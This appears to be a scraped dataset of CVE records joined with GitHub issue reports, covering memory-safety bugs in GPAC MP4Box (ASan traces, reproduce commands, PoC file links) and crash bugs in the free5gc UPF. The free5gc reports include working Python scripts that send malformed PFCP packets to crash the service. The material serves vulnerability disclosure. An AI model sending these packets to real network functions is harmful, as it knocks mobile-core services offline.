/home/user/fuzzing_gpac/gpac/src/isomedia/box_code_base.c:7805:2 #2 0x7f57c0026335 in gf_isom_box_new /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:1896:9 #3 0x7f57c0026335 in gf_isom_box_new_parent /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2351:14 #4 0x7f57c0d06f05 in mp4_mux_process_sample /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:4915:9 #5 0x7f57c0cf85a4 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6653:8 #6 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14 #7 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7 SUMMARY: AddressSanitizer: heap-use-after-free /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples Shadow bytes around the buggy address: 0x0c167fff8360: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c167fff8370: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c167fff8380: 00 00 00 00 05 fa fa fa fa fa fa fa fa fa 00 00 0x0c167fff8390: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c167fff83a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c167fff83b0: fd[fd]fa fa fa fa fa fa fa fa fd fd fd fd fd fd 0x0c167fff83c0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c167fff83d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa 0x0c167fff83e0: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd 0x0c167fff83f0: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd 0x0c167fff8400: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==836900==ABORTING ``` # Reproduce ``` ./MP4Box -dash 10000 poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/gpac/MP4Box/huaf_936 # Credit ``` Gandalf4a ```
heap-use-after-free in ./gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples
https://api.github.com/repos/gpac/gpac/issues/2611/comments
0
2023-10-08T16:10:40Z
2023-10-12T14:08:21Z
https://github.com/gpac/gpac/issues/2611
1,931,883,357
2,611
5,747
CVE-2023-48013
2023-11-15T19:15:07.753
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/cd8a95c1efb8f5bfc950b86c2ef77b4c76f6b893" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2612" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/cd8a95c1efb8f5bfc950b86c2ef77b4c76f6b893" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2612" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/gpac/gpac/issues/2612
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` /home/user/vul/MP4Box_crash/id000037sig06src002502time27968081execs258947ophavocrep16 [32m[iso file] Unknown box type 00000000 in parent moov [0m[32m[iso file] Unknown top-level box type 00000100 [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$ [0m[32m[Dasher] No bitrate property assigned to PID V1, computing from bitstream [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2 [0m[32m[iso file] Unknown box type 00000000 in parent moov [0m[33m[Dasher] Representation not initialized, dropping non-SAP1/2 packet CTS 18446744073709551615/12288 [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2 [0m[31m[MuxIsom] Packet with no CTS assigned, cannot store to track, ignoring [0m[31m[IsoMedia] File truncated, aborting read for track 1 [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2 [0m[37mDashing P1 AS#1.1(V) done (1 segs) [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property [0m[32m[MPD] Generating MPD at time 2023-10-08T12:38:38.043Z [0m[32m[Dasher] End of Period [0m[32m[Dasher] End of MPD (no more active streams) [0m================================================================= ==827317==ERROR: AddressSanitizer: attempting double-free on 0x619000015980 in thread T0: #0 0x55e7797a5972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) #1 0x7f525cd97945 in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17 #2 0x7f525cd6a022 in gf_fq_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_queue.c:105:33 #3 0x7f525cda14e5 in gf_filter_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:664:3 #4 0x7f525cd6ede9 in gf_fs_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:782:4 #5 0x7f525c6283f6 in gf_dasher_clean_inputs /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:164:3 #6 0x7f525c6283f6 in gf_dasher_del /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:173:2 #7 0x55e779809d2d in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4894:2 #8 0x55e7797fab6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7 #9 0x7f525b629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #10 0x7f525b629e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #11 0x55e779722dd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) 0x619000015980 is located 0 bytes inside of 1084-byte region [0x619000015980,0x619000015dbc) freed by thread T0 here: #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) #1 0x7f525c4f7ab6 in Media_GetSample /home/user/fuzzing_gpac/gpac/src/isomedia/media.c:619:30 #2 0x7f525c45d7b3 in gf_isom_get_sample_ex /home/user/fuzzing_gpac/gpac/src/isomedia/isom_read.c:1975:6 #3 0x7f525d05a156 in isor_reader_get_sample /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read_ch.c:398:19 #4 0x7f525d04d2d5 in isoffin_process /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read.c:1486:5 #5 0x7f525cdafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7 previously allocated by thread T0 here: LLVMSymbolizer: error reading file: No such file or directory #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) #1 0x7f525cd00add in gf_filter_pck_expand /home/user/fuzzing_gpac/gpac/src/filter_core/filter_pck.c:1846:15 #2 0x7ffd05c3a8df ([stack]+0x328df) SUMMARY: AddressSanitizer: double-free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) in free ==827317==ABORTING ``` # Reproduce ``` ./MP4Box -dash 10000 poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/gpac/MP4Box/df_105972 # Credit ``` Gandalf4a ```
double-free in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17
https://api.github.com/repos/gpac/gpac/issues/2612/comments
0
2023-10-08T16:13:47Z
2023-10-12T14:17:39Z
https://github.com/gpac/gpac/issues/2612
1,931,884,388
2,612
5,748
CVE-2023-48014
2023-11-15T19:15:07.803
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/66abf0887c89c29a484d9e65e70882794e9e3a1b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2613" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/66abf0887c89c29a484d9e65e70882794e9e3a1b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2613" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2613
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` /home/user/vul/MP4Box_crash/id000085sig06src003627time38285673execs366724ophavocrep8 [31m[HEVC] Error parsing NAL unit type 2 [0m================================================================= ==833362==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdcf3828d0 at pc 0x7f6e8e6ab0c1 bp 0x7ffdcf382870 sp 0x7ffdcf382868 WRITE of size 1 at 0x7ffdcf3828d0 thread T0 #0 0x7f6e8e6ab0c0 in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42 #1 0x7f6e8e66492e in gf_hevc_read_vps_bs_internal /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8095:9 #2 0x7f6e8e66b0e5 in gf_hevc_parse_nalu_bs /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8756:30 #3 0x7f6e8f25c2ca in naludmx_check_dur /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:576:10 #4 0x7f6e8f264622 in naludmx_check_pid /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:1826:3 #5 0x7f6e8f252dc5 in naludmx_process /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:3370:4 #6 0x7f6e8edafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7 #7 0x7f6e8ed7d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3 #8 0x7f6e8ed7b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3 #9 0x7f6e8e62ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6 #10 0x5572d97a66dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15 #11 0x5572d9797b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7 #12 0x7f6e8d629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f6e8d629e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #14 0x5572d96bfdd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) Address 0x7ffdcf3828d0 is located in stack of thread T0 at offset 80 in frame #0 0x7f6e8e6a4abf in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7690 This frame has 12 object(s): [32, 48) 'dimension_id_len' (line 7693) [64, 80) 'dim_bit_offset' (line 7693) <== Memory access at offset 80 overflows this variable [96, 100) 'layer_set_idx_for_ols_minus1' (line 7695) [112, 117) 'nb_output_layers_in_output_layer_set' (line 7696) [144, 149) 'ols_highest_output_layer_id' (line 7697) [176, 240) 'num_direct_ref_layers' (line 7700) [272, 336) 'num_pred_layers' (line 7700) [368, 372) 'num_layers_in_tree_partition' (line 7700) [384, 400) 'dependency_flag' (line 7701) [416, 672) 'id_pred_layers' (line 7701) [736, 800) 'layer_id_in_list_flag' (line 7706) [832, 896) 'OutputLayerFlag' (line 7707) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension Shadow bytes around the buggy address: 0x100039e684c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e684d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e684e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e684f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e68500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100039e68510: f1 f1 f1 f1 00 00 f2 f2 00 00[f2]f2 04 f2 05 f2 0x100039e68520: f2 f2 05 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2 0x100039e68530: f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 04 f2 0x100039e68540: 00 00 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e68550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100039e68560: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==833362==ABORTING ``` # Reproduce ``` ./MP4Box -dash 10000 poc ``` # POC File https://github.com/gandalf4a/crash_report/blob/main/gpac/MP4Box/sbo_7735 # Credit ``` Gandalf4a ```
stack-buffer-overflow in /gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension
https://api.github.com/repos/gpac/gpac/issues/2613/comments
0
2023-10-08T16:15:17Z
2023-10-12T14:46:27Z
https://github.com/gpac/gpac/issues/2613
1,931,886,016
2,613
5,749
CVE-2023-47345
2023-11-15T22:15:27.877
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/483" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/483" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/483
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero ## Describe the bug While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash. ## To Reproduce Steps to reproduce the behavior: 1. Build the UPF with source code 2. Run the bin/upf with default config/upfcfg.yaml 3. Run the following POC python script ```python #!/usr/bin/env python3 import socket udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_socket.settimeout(1.0) pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00' """ PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero """ pfcp_heartbeat_request = b'\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4' udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.close() ``` ## Expected behavior Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the IE length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF. ## Screenshots No special screenshot is provided. ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 20.04 - Kernel version: 5.4.5-050405-generic - go version: go1.21.1 linux/amd64 ## Trace File ### Configuration File No specific configuration is required. ### PCAP File No specific pcap file is provided. ### Log File ```bash time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version: \n\tNot specify ldflags (which link version) during go build\n\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from [upfcfg.yaml]" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(*factory.Config)(0xc0000147d0)({\n\tVersion: (string) (len=5) \"1.0.3\",\n\tDescription: (string) (len=31) \"UPF initial local configuration\",\n\tPfcp: (*factory.Pfcp)(0xc00006f170)({\n\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\tNodeID: (string) (len=9) \"127.0.0.8\",\n\t\tRetransTimeout: (time.Duration) 1s,\n\t\tMaxRetrans: (uint8) 3\n\t}),\n\tGtpu: (*factory.Gtpu)(0xc00006f320)({\n\t\tForwarder: (string) (len=5) \"gtp5g\",\n\t\tIfList: ([]factory.IfInfo) (len=1 cap=1) {\n\t\t\t(factory.IfInfo) {\n\t\t\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\t\t\tType: (string) (len=2) \"N3\",\n\t\t\t\tName: (string) \"\",\n\t\t\t\tIfName: (string) \"\",\n\t\t\t\tMTU: (uint32) 0\n\t\t\t}\n\t\t}\n\t}),\n\tDnnList: ([]factory.DnnList) (len=1 cap=1) {\n\t\t(factory.DnnList) {\n\t\t\tDnn: (string) (len=8) \"internet\",\n\t\t\tCidr: (string) (len=12) \"10.60.0.0/24\",\n\t\t\tNatIfName: (string) \"\"\n\t\t}\n\t},\n\tLogger: (*factory.Logger)(0xc000022e40)({\n\t\tEnable: (bool) true,\n\t\tLevel: (string) (len=4) \"info\",\n\t\tReportCaller: (bool) false\n\t})\n})\n" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to [info]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to [false]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder [gtp5g]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \"127.0.0.8:2152\"" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF" time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF" time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF" time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF" time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range [6:4]\ngoroutine 6 [running]:\nruntime/debug.Stack()\n\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\npanic({0x84f480?, 0xc0001c4318?})\n\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\ngithub.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\ncreated by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start in goroutine 1\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" ```
[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero
https://api.github.com/repos/free5gc/free5gc/issues/483/comments
4
2023-09-22T03:19:07Z
2023-11-26T13:11:19Z
https://github.com/free5gc/free5gc/issues/483
1,908,115,920
483
5,750
CVE-2023-47347
2023-11-15T22:15:27.930
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/496" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/496" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/496
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
[Bugs] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes ## Describe the bug While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash. ## To Reproduce Steps to reproduce the behavior: 1. Build the UPF with source code 2. Run the bin/upf with default config/upfcfg.yaml 3. Run the following POC python script ```python #!/usr/bin/env python3 import socket udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_socket.settimeout(1.0) pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00' pfcp_heartbeat_request = b'\x20\x01\x00\x0f\x00\x00\x00\xff\xff\xff\x00\x00\x60\x00\x04\xe8\x1f\xdc\x30' udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}") udp_socket.close() ``` 